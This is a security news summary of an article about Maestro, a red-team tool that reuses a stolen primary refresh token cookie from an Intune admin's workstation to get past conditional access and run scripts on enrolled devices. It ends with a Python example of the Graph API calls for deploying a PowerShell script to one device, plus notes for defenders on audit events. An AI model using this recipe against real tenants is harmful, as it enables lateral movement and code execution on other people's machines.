RSS Security Boulevard

Maestro

The article discusses why using Intune for lateral movement from a command and control (C2) agent is harder than it first appears. Even with an Intune admin's workstation compromised, executing scripts or applications on Intune-enrolled devices is not straightforward: conditional access policies (CAPs) and multi-factor authentication (MFA) requirements stand between a stolen credential and the Intune management APIs. The operator also has to stay stealthy, which rules out running well-known tooling on the compromised host or generating log entries that stand out.

To clear these hurdles, the author introduces Maestro, an open-source tool that automates the use of an Intune admin's privileges to act on Intune-enrolled devices. Maestro starts from a primary refresh token (PRT) cookie obtained on the compromised workstation. Because the PRT already reflects the admin's enrolled device and completed MFA, tokens derived from it satisfy the same CAPs that would block a credential replayed from an attacker-controlled machine. With that cookie Maestro authenticates to Entra ID (Azure AD), acquires the tokens it needs, and issues the HTTP requests that execute scripts and applications and run device queries on Intune devices, so the operator never has to assemble those requests by hand.

Maestro can be used to execute the "Death from Above" attack path, which reaches a code repository by moving laterally from the admin's access to the workstation of a user who can reach that repository. The author provides a walkthrough of using Maestro from the Mythic C2 framework to execute scripts and applications on Intune devices and to query devices. Maestro can also resolve user IDs to user principal names and query device inventory in real time. The tool's features and usage are demonstrated through examples such as executing PowerShell scripts and applications on Intune devices.
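To make the "acquire tokens, then make HTTP requests" part concrete, here is an added example (written for this page, not Maestro's code and not the article's) of the documented Microsoft Graph calls behind running a PowerShell script on a single Intune-managed device. It assumes a Graph bearer token has already been obtained (Maestro derives one from the PRT cookie; that step is not reproduced here) and that the assignment is scoped to one device with an assignment filter, which is one workable approach and not necessarily the one Maestro uses. The transport is injectable and a constructed fake stands in for graph.microsoft.com so the code runs offline; the device name, GUIDs and token are made-up sample values.

```python
# Added example (not Maestro's code): the Microsoft Graph requests behind
# "run a PowerShell script on one Intune-managed device", with an injectable
# transport so it runs offline. Assumes a Graph bearer token is already in hand.
import base64
from dataclasses import dataclass
from typing import Callable, Optional

GRAPH = "https://graph.microsoft.com"


@dataclass
class Request:
    method: str
    path: str                     # path under GRAPH, e.g. "/v1.0/users/..."
    body: Optional[dict] = None


class IntuneClient:
    """Minimal client; every write it issues is recorded in the Intune audit log."""

    def __init__(self, token: str, send: Callable[[Request, dict], dict]):
        self.headers = {"Authorization": f"Bearer {token}",
                        "Content-Type": "application/json"}
        self._send = send         # transport: (request, headers) -> parsed JSON
        self.trail: list[Request] = []

    def call(self, method: str, path: str, body: Optional[dict] = None) -> dict:
        req = Request(method, path, body)
        self.trail.append(req)
        return self._send(req, self.headers)

    def resolve_upn(self, user_id: str) -> str:
        """Map an object ID to a user principal name."""
        r = self.call("GET", f"/v1.0/users/{user_id}?$select=userPrincipalName")
        return r["userPrincipalName"]

    def find_device(self, device_name: str) -> dict:
        r = self.call("GET", "/v1.0/deviceManagement/managedDevices"
                      f"?$filter=deviceName eq '{device_name}'")
        matches = r.get("value", [])
        if len(matches) != 1:
            raise LookupError(f"{len(matches)} devices named {device_name!r}")
        return matches[0]

    def run_script(self, device_name: str, ps_source: str,
                   run_as: str = "system") -> dict:
        device = self.find_device(device_name)
        # 1. Assignment filter matching only this device (assumed scoping approach).
        flt = self.call("POST", "/beta/deviceManagement/assignmentFilters", {
            "displayName": f"only-{device_name}",
            "platform": "windows10AndLater",
            "rule": f'(device.deviceName -eq "{device_name}")',
        })
        # 2. The script object; Graph expects the script text base64-encoded.
        script = self.call("POST", "/beta/deviceManagement/deviceManagementScripts", {
            "displayName": f"maint-{device_name}",
            "fileName": "maint.ps1",
            "runAsAccount": run_as,            # "system" or "user"
            "enforceSignatureCheck": False,
            "runAs32Bit": False,
            "scriptContent": base64.b64encode(ps_source.encode("utf-8")).decode("ascii"),
        })
        # 3. Assign to All Devices, narrowed to one device by the include filter.
        self.call("POST", f"/beta/deviceManagement/deviceManagementScripts/{script['id']}/assign", {
            "deviceManagementScriptAssignments": [{
                "target": {
                    "@odata.type": "#microsoft.graph.allDevicesAssignmentTarget",
                    "deviceAndAppManagementAssignmentFilterId": flt["id"],
                    "deviceAndAppManagementAssignmentFilterType": "include",
                }
            }]
        })
        # 4. Ask the device to check in now rather than waiting for its next sync.
        self.call("POST", f"/v1.0/deviceManagement/managedDevices/{device['id']}/syncDevice")
        return {"device_id": device["id"], "script_id": script["id"], "filter_id": flt["id"]}

    def writes(self) -> list:
        """POST paths issued: the footprint a defender can look for in audit events."""
        return [r.path for r in self.trail if r.method == "POST"]


# Constructed offline transport standing in for graph.microsoft.com.
def fake_graph(req: Request, headers: dict) -> dict:
    assert headers["Authorization"].startswith("Bearer ")
    if req.path.startswith("/v1.0/users/"):
        return {"userPrincipalName": "dev1@contoso.example"}
    if req.path.startswith("/v1.0/deviceManagement/managedDevices?"):
        return {"value": [{"id": "dev-guid-1", "deviceName": "DEV-WS01"}]}
    if req.path.endswith("/assignmentFilters"):
        return {"id": "filter-guid-1"}
    if req.path.endswith("/deviceManagementScripts"):
        return {"id": "script-guid-1", "scriptContent": req.body["scriptContent"]}
    return {}                     # assign and syncDevice answer 204 No Content


if __name__ == "__main__":
    c = IntuneClient("fake-token", fake_graph)
    print(c.resolve_upn("00000000-0000-0000-0000-000000000001"))
    print(c.run_script("DEV-WS01", "whoami | Out-File C:\\ProgramData\\who.txt"))
    for p in c.writes():
        print("POST", p)
```

The `writes()` list is the useful part for both sides: an operator sees that even one script execution leaves four write operations (filter creation, script creation, assignment, forced sync) in the tenant, and a defender can correlate exactly those audit events, especially when the actor is an admin account acting on a single device outside normal change windows.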
securityboulevard.com